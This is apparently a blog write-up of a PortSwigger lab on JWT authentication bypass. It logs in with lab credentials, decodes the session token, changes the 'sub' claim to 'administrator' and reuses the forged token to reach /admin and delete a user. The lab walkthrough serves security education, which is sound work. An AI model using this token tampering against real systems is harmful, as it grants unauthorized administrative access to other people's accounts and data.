JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023

Portswigger Lab Solution — JWT Authentication Bypass by Karthikeyan Nagaraj

Lab Link:

JWT attacks | Web Security Academy

Lab Description:

This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn’t verify the signature of any JWTs that it receives.

To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

What is JWT?

JWT refers to JSON Web Tokens

JSON Web Token is a proposed Internet standard for creating data with optional signature and/or optional encryption whose payload holds JSON that asserts some number of claims.

The tokens are signed either using a private secret or a public/private key

Analysis:

1. Login withwiener:peter

2. Now Look at the Cookie usingCookie Editor or byIntercepting the Traffic

eyJraWQiOiJlMWYyMzczMC00NDUxLTRjMTMtYWViZi04M2Y2MmMxYmYzOGEiLCJhbGciOiJSUzI1N
iJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY3MzgwMTUxNH0.
NpgK9DOlKKauq0iI255qe5HbYVyEv8Ze9ODe6VfKdh6VkJ9fOMOL5o_rpwvtxxHsakeZPXN8ktG1S
L5y9I-D2zfHhLMI3hWGXXdXVXyw0GGbOkfCmJJWyDDljPrQYvcqJbB2uPvsDs7IkVhyklK89-Q2wo
AGQU4KVAiXBa7tM-pWIgsqn8w9Dl1jNc1cfMJ0yVjfmo5qEOIaFMlIkNvzfYuihsdjTZDOA00ZgD
j9K3eryQn1zPJh7hMp6on1mwK1ieQ_aO-dIWZ_x3bXYootpX08ijfdmL12VKr9_RKv9ppQiDbqXv
YsTC36482Wlc5LRfCOx_XE_VaQu62a0Q10hA

It Looks like they have used Jwt for Authentication

3. Let’s Decrypt the token using jwt.io

JWT.IO

From this, we can able to understand that thesub value defines the user who is logged in.

If we changed the sub-value to the name of another person, then we can access their account with the Privilege of that user, such as admin

4. Change the Valuewiener toadministrator

As long as you change the value the token also gets changed

eyJraWQiOiJlMWYyMzczMC00NDUxLTRjMTMtYWViZi04M2Y2MmMxYmYzOGEiLCJhbGciOiJSUz
I1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE
2NzM4MDE1MTR9.PEWC1x0JyP2oADxuxvfj_rNI-wZqxjvkyPsFvDK5_jVCXg9kb-00OHg9b7GR
cugRVLokInxsb0IpDunxIgvD362TbQBI4ONACpou0nmBH11a9nkCrQ7qxkFMYgb6cKM7JQjX2g
n5IvArWmUPOvSQUZv9hKBautpLijRAn8xn6z4-Y6UOYtfdqUnQrj0S-4oetIMPP29soB9x6yQ8
0YPk81dHi7OanX5TR1izRmCIXn_7RA2WiTHSnNsB2ARDuzXsVzel97g4-pFUdInybgGizMIRp5
942G3JU352hzjIw3XXw_3x1InT0DJPdFR7iaF4q3KY0O_WkJirodni-uf2eA

The Above token’s value is set to administrator

5. Copy the token, and paste it into the session using theCookie editor

6. Then try to Access the/admin page

7. Now you will have the access to delete users, delete Carlos to solve the lab

Watch the below gif!!

Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )

Thank you for Reading!!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng